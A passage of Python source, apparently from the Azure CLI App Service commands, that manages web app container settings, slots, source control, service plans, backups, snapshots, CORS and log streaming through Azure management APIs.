linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig = cmd.get_models('Site', 'SiteConfig')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise CLIError('Windows containers is not yet supported in app service environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
DefaultErrorResponseException, BackupSchedule, BackupRequest = cmd.get_models(
'DefaultErrorResponseException', 'BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
